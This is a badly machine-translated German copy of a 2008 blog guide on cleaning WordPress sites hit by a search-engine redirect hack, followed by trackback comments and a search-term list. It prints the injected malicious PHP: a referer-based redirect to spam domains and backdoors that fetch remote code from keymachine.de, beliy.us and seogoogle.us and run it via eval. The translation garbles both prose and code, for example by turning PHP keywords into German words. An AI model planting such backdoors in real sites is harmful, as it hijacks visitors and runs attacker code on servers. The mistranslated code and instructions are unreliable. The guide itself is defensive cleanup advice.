WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die zu Your-Needs.info, zu AnyResults.Net, zu Golden-Info.net und zu anderen ungültigen Aufstellungsorten umadressiert werden

Häcker gehen alle heraus, zum zu zerhacken und WordPress Bloge auszunutzen bewirtete alle über dem Netz und pflanzte und böswilligen Code in WordPress Codes und Datenbank einspritzend, um Besucher und Schläge von Google und von anderem, zahlen-pro-klicken Suchmaschinen spam umzuadressieren Aufstellungsorte wie your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us und viele anderen Spamaufstellungsorte, denen füllte mit, CPC-Anzeigen. Irgendeine Kerbe scheint, größere Masse zu zielen, indem sie alle ohne WordPress Plätzchen umadressiert. Ohne zerhackt handeln diese angenommen, um im Blog als Bestimmungsort anzukommen.

Symptome der Engine-Umlenkungs-Kerbe

Merken Sie, dass nicht alle Symptome zusammen geschehen können. Es kann mehr, als geben eine Methode der Kerben existierte, die zum unterschiedlichen Finden und zur möglichen Entschließung beitrugen.

  • Jedes mögliches Klicken durch von den Suchmaschinen wie Google, Yahoo, AOL, MSN, Windows-Phasensuchresultate, einschließlich Blognamen, wird zu den Aufstellungsorten des Hackers wie your-needs.info, anyresults.net, golden-info.net, keymachine.de, beliy.us, seogoogle.us, mit der Liste umadressiert und nachgeschickt, die sicher ist zu wachsen. Projektor kommt in der Hackerseite mit der gleichen Suchschnur an, die er oder sie pflegten, um in der Search Engine zu suchen.
  • Klicken Sie an eine Verbindung zum Blog auf RSS Zufuhrleser wie Google-Leser kann zum Hackeraufstellungsort auch umadressiert werden.
  • Ein Besucher ohne Konto auf dem Blog oder nicht LOGON (tut folglich nicht lässt Plätzchen durch böswilligen Code ermitteln), werden spam Aufstellungsorte umadressiert.
  • Nur Besuche von der Search Engine werden weg umadressiert, und der Trick erreichen, viele Bloggers, Webmasters und Aufstellungsortinhaber herum vermutlich zu täuschen oder verzögern mindestens die Abfragung des Probleme.
  • Plötzlicher sehr großer und drastischer Tropfen und verlieren von der enormen Menge Besuchern handeln und paginieren Ansichten in Netzverfolgerstatistiken, besonders Verkehr mit Google als referrer, obwohl das Engineresultatsordnen intakt ist.
  • Massic Tropfen der Werbeeinnahmen von Google AdSense oder anderes Anzeigennetz oder Teilnehmerkommissionen.
  • Der folgende base64 verschlüsselte PHP-Code kann auf der wp-blog-header.php Akte erscheinen:

    <? PHP \
    $seref=array („Google“, „msn“, „Phasen“, „AltaVista“, „bitten“, „Yahoo“, „AOL“, „CNN“, „Wetter“, „alexa“);
    $ser=0; foreach ($seref als $ref) wenn (strpos (strtolower ($_SERVER ['HTTP_REFERER']), $ref)! ==false) {$ser=“ 1? ; Bruch; }
    wenn ($ser==“ 1? && sizeof ($_COOKIE) ==0) {Überschrift (“ Position: http://“ .base64_decode (“ YW55cmVzdWx0cy5uZXQ="). “/"); Ausgang; }? >

  • Ein Bild, das tatsächlich ein Bündel des böswilligen PHP-Codes ist, wurde dem Wpinhalt/dem Antriebskraftverzeichnis hinzugefügt. Z.B. können Wpinhalt/uploads/2008/06/06/abcdefghijklmn.jpg oder es innerhalb Ihres Themafaltblatts, d.h. Wpinhalt/Themen/Klassiker/Bilder/xyz.jpg sein. Der Name des Bildes kann im Format von xxxxxx_old.jpeg sein.
  • Eine Eintragung wurde in der MySQL Datenbank eingesetzt, damit WordPress wp_options das Bild (den böswilligen PHP-Code) als Einsteck, gewöhnlich als rss_f541b3abd05e7962fcab37737f40fad8 aktivieren.
  • Es kann böswillige Codes, besonders die auch geben, die mit eval () oder base64_decode () Befehl eingesetzt in andere WordPress PHP-Akten deuteten. Beispiele sind die folgenden Codes:

    wenn (isset ($_GET [„p“])) {
    $sock = @fsockopen ('km20725.keymachine.de', 80);
    wenn ($sock) {
    fwrite ($sock, `ERHALTEN http://km20725.keymachine.de/server/index.php?host= '. $_SERVER [„SERVER_NAME“]. '&p='.$_GET [„p“]. '′ HTTP/1.0. “ \ r \ n ");
    fwrite ($sock, `Wirt: km20725.keymachine.de'.“ \ r \ n \ r \ n ");
    während ($content [] = fgets ($sock));
    $content = implodieren (“, $content);
    @eval (Ordnung (substr ($content, strpos ($content, „\ r \ n \ r \ n "))));
    fclose ($sock);}
    }

    wenn (isset ($_GET [„p“])) {@eval (@file_get_contents ('http://beliy.us/server/index.php?host= '. $_SERVER [„SERVER_NAME“]. '&p='.$_GET [„p“]));
    }

    wenn (isset ($_GET [„p“])) {@eval (@file_get_contents ('http://seogoogle.us/server/index.php?host= '. $_SERVER [„SERVER_NAME“]. '&p='.$_GET [„p“]));
    }

    eval (gzinflate (base64_decode (

  • WordPress Thema, das aktiviert und verwendet ist, kann mit dem Zerhacken des Codes eingespritzt werden und auch beeinflußt werden. Solcher Code existiert normalerweise in header.php oder in index.php des Themas und hat eine Linie, die dem untengenannten ähnlich ist

    wenn ($ser==“ 1 ″ && sizeof ($_COOKIE) ==0) {Überschrift (“ Position:

Der WordPress Suchverkehr adressiert spam Aufstellungsortkerbe geschieht vermutlich wegen der Sicherheitslücke und der Verwundbarkeit um, die nicht ausgebessert wird, wenn Bloginhaber, sich entscheidet nicht zur spätesten Version von WordPress zu verbessern (obgleich einige Reports dass ihre Bloge zerhackt, obwohl sie bereits auf der spätesten Version von WordPress 2.5.1 ist). Was auch immer die Ursache, hier die Verlegenheit und die Lösung ist, zum der Kerbe zu lösen und zu besiegen, um zu garantieren, dass Sie zurück den Verkehr besitzen und vermeiden Sie bestraft von Google durch das unvernünftige Umadressieren spam Seiten.

  1. Unterstützung die WordPress Datenbank.
  2. Verwenden Sie phpMyAdmin, um WordPress MySQL zu grasen Datenbanktabellen. Zum wp_options Tabelle und redigieren dann die Reihe, die gehen active_plugins genannt wird. Die Reihe führt alle aktiven Steckverbindungen einzeln auf, die aktiviert worden ist. Die Liste (in einer Linie), durch und suchen nach ein Einsteck genannt beendet mit einer Bildverlängerung, wie .jpg, .jpeg, .gif und etc. zum Beispiel, laufen abcdefgh_old.jpeg. Merken Sie hinunter den Weg zur Bildakte.
  3. Unter Verwendung des sFTP oder SSH (vergessen Sie über ftp oder telnet für Sicherheit), dann steuern Sie zum Weg der Akte, und löschen Sie die Akte.
  4. Gehen Sie zur WordPress Verwalter-Steckverbindungverkleidung, entaktivieren Sie oder aktivieren Sie irgendwie Einsteck, um weg vom böswilligen Einsteck von der „active_plugins“ Reihe zu löschen.
  5. Zurück zu phpMyAdmin am wp_options Tisch, finden Sie eine Reihe, die die folgende Schnur als option_name enthält:

    rss_f541b3abd05e7962fcab37737f40fad8

    Löschen Sie die wegreihe.

    Wenn Sie nicht durchführen können, ist die Datenbankreinigung, die in den Schritten oben einzeln aufgeführt wird, hier ein videotutorium:

  6. Gehen Sie zum wp_users Tabelle. Wenn es einen namenlosen Benutzer (ungültiger Wert im user_nicename Feld) hergestellt am 00:00 gibt: 00 auf 0000-00-00, Anmerkung hinunter die Benutzernummer (Identifikation-Feld, eine Zahl). Löschen Sie den Benutzer.
  7. Grasen Sie die wp_usermeta Tabelle. Lokalisieren Sie alle Reihen mit user_id Gleichen die Identifikation des gelöschten ungültigen Benutzers. Es gibt normalerweise drei Reihen verbunden zur Eindringlingbenutzernummer. Löschen Sie alle verbundenen Reihen.
  8. Melden Sie zum Bediener an, um die Themaakten zu redigieren, oder grasen Sie den Code der Themaakten im Thema-Herausgeber der WordPress Verwalter-Entwurfsverkleidung. Überprüfen Sie das header.php und das index.php auf jedem misstrauischen Code. Wie oben erwähnt, suchen Sie nach etwas, das der Linie unten ähnlich ist:

    wenn ($ser==“ 1 ″ && sizeof ($_COOKIE) ==0) {Überschrift (“ Position:

    Wenn Sie gefunden werden, löschen Sie und entfernen Sie den Code. Merken Sie, dass der böswillige Code einige Linien lang in der Gesamtmenge ist.

  9. Wenn er nicht bereits existiert wird, stellen Sie eine leere index.html-Akte im Wpinhalt/im Steckverbindungverzeichnis her. Unbelegte index.html versteckt den Inhalt des Steckverbindungverzeichnisses, abschirmen effektiv, welche Steckverbindungen verwendet von den Häckern, um die WordPress Sicherheit zu verhärten und festzuziehen.
  10. Laden Sie und ersetzen Sie jedes WordPress Akten (nicht nur wp-blog-header.php) auf dem Bediener durch die neue, saubere und der Vorlage späteste Version von WordPress (selbstverständlich, ausgenommen wenige Akten wie wp-config.php und Themen). Wenn Sie verbessern, lesen Sie den Führer sorgfältig.
  11. Ändern Sie Ihr Kennwort.
  12. Wenn Sie mehrere Benutzer haben, ändern Sie ihr Kennwort (oder bitten Sie um um sie, um das Kennwort zu ändern), auch.

WICHTIG: Die Seite ist und vorausgesetzt „maschinell übersetzt, wie“ ohne Garantie ist. Maschinelle Übersetzung kann schwierig sein zu verstehen. Beziehen Sie bitte sich auf ursprünglichen englischen Artikel, wann immer möglich.


16 Antworten „zur WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die umadressiert werden zu Your-Needs.info, zu AnyResults.Net, zu Golden-Info.net und zu anderen ungültigen Aufstellungsorten“

  1. Viidar.net“ Hjelp! WordPress-databasen Minute äh hacket!
    6. Juni 2009 23:36
    16

    [...] WordPress Kerbe: Gewinnen Sie zurück und regeln Sie [...]

  2. cenary
    19. Mai 2009 20:22
    15

    Jangan lupa terus Update wordpressnya, terutama Einsteckyang suka ada bolong.

  3. Взлом WordPress: перенаправлениепоисковоготрафикаитрафикабез Plätzchen наспамсайты | SEO ИЗ-ЗАБУГРА
    12. Dezember 2008 17:03
    14

    [...] Переводстатьи WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die umadressiert werden zu Ihr-Nee… [...]

  4. Ravi Kalmady
    21. November 2008 13:25
    13

    Ich komme gerade aus dieses Problem heraus.

    Mein wp-blog-header.php wurde mit dem Trödelcode geladen, der alle Search Engine weg von meinem Aufstellungsort umadressiert. Ich hatte NULLengineverkehr für vier Tage.

    wp-blog-header.php, das wirklich 1KB ist, wurde mit 19KB des böswilligen Codes geladen. Es gerade säubern genügt nicht auch nicht weil die alte Akte nicht überschreiben oder löschen darf. Musste mit Erlaubnis herum basteln.

    Danke für diesen Pfosten, der etwas Extralicht auf meiner Situation warf.

    Wirklich bin ich, also Paranoid, jetzt, das ich nicht sogar den Namen meiner Web site hier erwähnen möchte!

  5. Blog gue dihack, Großtat apalah IFU namanya | hexno
    31. Oktober 2008 11:53
    12

    [...] cara lebih lengkapnya buat nanggulangin masalah ini, baca aja disini. [...]

  6. Stato transitorio am pensieri (pulsazioni)
    25. Juli 2008 09:49
    11

    [...] avere una merda kommen Quella Tra le Mani. Se siete già stati infestati o Pensate di Esserlo, qui e Qui Troverete le Specifiche dell'exploit e alcuni consigli utili pro [...]

  7. Mikrofon demers punktieren Netz“ Blog-Archiv,“, das mein WordPress Blog durch eine Spammer zerhackt erhält
    17. Juli 2008 10:30
    10

    [...] WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die umadressiert werden zu Ihr-Nee…. [...]

  8. Zerhackt! Angenommener Angriffsaufstellungsort. | Ethan W. Brown: //etano.net
    15. Juli 2008 08:10
    9

    [...] I verfing sich es früh und stellte sicher, den ganzen böswilligen Code zu entfernen.  Ist hier nettes Tutorium auf, wie man Ihren Aufstellungsort säubert, wenn dieses waren, [...] zu geschehen

  9. Blogosfera virusata… dar, Cugrube Cer-ati avut?! “ Heimlichkeit-Einstellungen
    3. Juli 2008 03:08
    8

    [...] Ca SamI dau sema unde e buba, Eugen spus FI daca NU MIaR Intr-o discutie La cafea, Ca ein FIbine-Salz vad gasit UNO-Verbindungs-PET Google si AR. MyDigitalLife.info, Au publicat UNO articol Cu titlul:  [...]

  10. blosque.com | Suas Visitas tun Google Sumiram? Seu Wordpress Pode Ter Sido Hackeado
    18. Juni 2008 22:08
    7

    [...] Mein Digital-Leben - WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr Redi… [...]

  11. Verbindungen für 2008-06-13 an nyc.locationscout.us
    13. Juni 2008 13:36
    6

    [...] WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die umadressiert werden - mein Digita… WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die zu Your-Needs.info, zu AnyResults.Net, zu Golden-Info.net und zu anderen ungültigen Aufstellungsorten “ mein Digital-Leben umadressiert werden (Umbauten: wordpress Sicherheit) [...]

  12. Chandos Internet-Marketing-Geheimnis-Blog-“ Blog-Archiv“ WordPress Bloge und mehr zerhackt durch Google Redirects
    13. Juni 2008 12:00
    5

    [...] Mein Digital-Leben - WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr Redi… [...]

  13. WordPress Blog di Hack | WordPress [an] mimpikami. COM
    12. Juni 2008 19:40
    4

    [...] Kalau peringkat Blog WordPress kita di Google tetap untuk Schlüsselwort kita, tapi pengunjung turun drastis, hati-hati, bisa jadi IFU artinya Blog kita kena Kerbe Dan-Di adressieren KE situs Spam um. [...]

  14. Wird Ihr Wordpress Blog zerhackt? Warum nicht Aufsteigen zur spätesten Version? | MyTestBox.com - Netz-Software-Berichte
    12. Juni 2008 14:43
    3

    [...] WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr, die umadressiert werden zu Ihr-Nee… Teilen Sie oder schicken Sie dieses zum Freunde Bereich: In Verbindung stehendes ContentWant mehr Netz-Software-Berichte? Stellen Sie Sie dann, zu unserer RSS Zufuhr zu unterzeichnen oder unseren kundengerechten Widget zu erhalten sicher und es auf Ihrem Aufstellungsort einzubetten! In Verbindung stehende Pfosten WordPress - die benutzte Quelleen-Blog-Software [...]

  15. Znów ataki Na WordPressowe blogi „zielony bloger pl
    12. Juni 2008 11:14
    2

    [...] wersja WP 2.5.1 była narażona Na jakieś problemy. Ein w całym tym zamieszaniu, zwanym już Engine-Umlenkungs-Kerbe, chodzi O przekierowanie ruchu z wyszukiwarek, głównie Google, choć nie tylko, Na specjalnie [...]

  16. WordPress Bloge und mehr zerhackt durch Google Redirects „Lorelle auf WordPress
    12. Juni 2008 10:06
    1

    [...] Mein Digital-Leben - WordPress Kerbe: Gewinnen Sie zurück und reparieren Sie Google und Search Engine oder kein Plätzchen-Verkehr Redi… [...]

Lassen Sie eine Antwort

Sie können diese Umbauten benutzen: <a href= "" title= "" > <abbr title= "" > <acronym title= "" > <b> <blockquote cite= "" > <cite> <code> <del datetime= "" > <em> <i> <q cite= "" > <strike> <strong>

Unterzeichnen Sie zu den Anmerkungen, die Eigenschaft gesperrt worden ist. Um Mitteilung der spätesten bekanntgegebenen Anmerkungen zu empfangen, unterzeichnen Sie zu meiner Zufuhr der Digital-Leben-Anmerkungen RSS oder das Register zum der neuen Anmerkungen in der täglichen eMail zu empfangen verdauen.
Custom Search

Neue Artikel

Ankommende Suchausdrücke für den Artikel

wordpress Kerbe - Google verbindet umadressiert - VERLEGENHEITgoogle-SUCHE - Google-Suchkerben - Google-Suche umadressierend - Entdeckung Google adressieren Sie Kerbe wordpress um - böswilliger Code der Reinigung von den wordpress - wie man Suche umadressiert regelt - Benutzer wordpress Kerbe Google-admin - wie ich repariere meine Google-Suchauflistung tue - Verlegenheit Google-Suchkerbe - wordpress header.php Ausgangskerbe des Plätzchens md5 - Google-Verbindungen adressieren Sie um - Google-Suchvollmacht-Kerbeverlegenheit - Google-SuchMeta-Verlegenheit - wie man mit einer Google-Suche umadressiert - wie man Search Engine regelt - wordpress zerhackte das Mobile - Software terbaru Kerbe Google - meinen Besuchernotfall auf meinem wordpress Blog - Google- Such kerbecodes zurückgewinnend - Google- Verbindungen umadressierte Verlegenheit zerhackt - ravy kalmady - wordpress zerhacken, wie man Sie kann allen möglichen Antworten zu dieser Eintragung durch das RSS folgen löscht - wordpress Google-Suche - die wordpress Überschrift zerhackt - wordpress, die Kerbe 2009 - atom.php Kerbe-Reparaturverlegenheit - das bagaimana cara kann, das Google analytische zerhackt - base64_decode Kerbe - cara Kerbe admin wordpress - Festlegung Google-Suche - Google adsense Kerben auf dem Bediener - die Google-Search Sites umadressiert - wie man wordpress zerhackt, erklären - gewinnen Sie wordpress erklären zurück - umadressieren zu index.html, wenn kein Plätzchen - umadressierte Suche Google - Fenster Update umadressiert zu Google - die wordpress zerhackt - Verlegenheit wordpress zerhackte - Verlegenheit Google - Google umadressieren Verlegenheit - Kerbe header.php wordpress - Kerbe search engine - wie zu zerhacken regeln Sie Suche umadressiert - wie lang, damit eine Web site von Spam verbindet zerhackt sich erholt - wie ich regele meine Google-Verbindungen vom Umadressieren - böswilliger Code in den wordpress - von wordpress Google-malicous Software tue -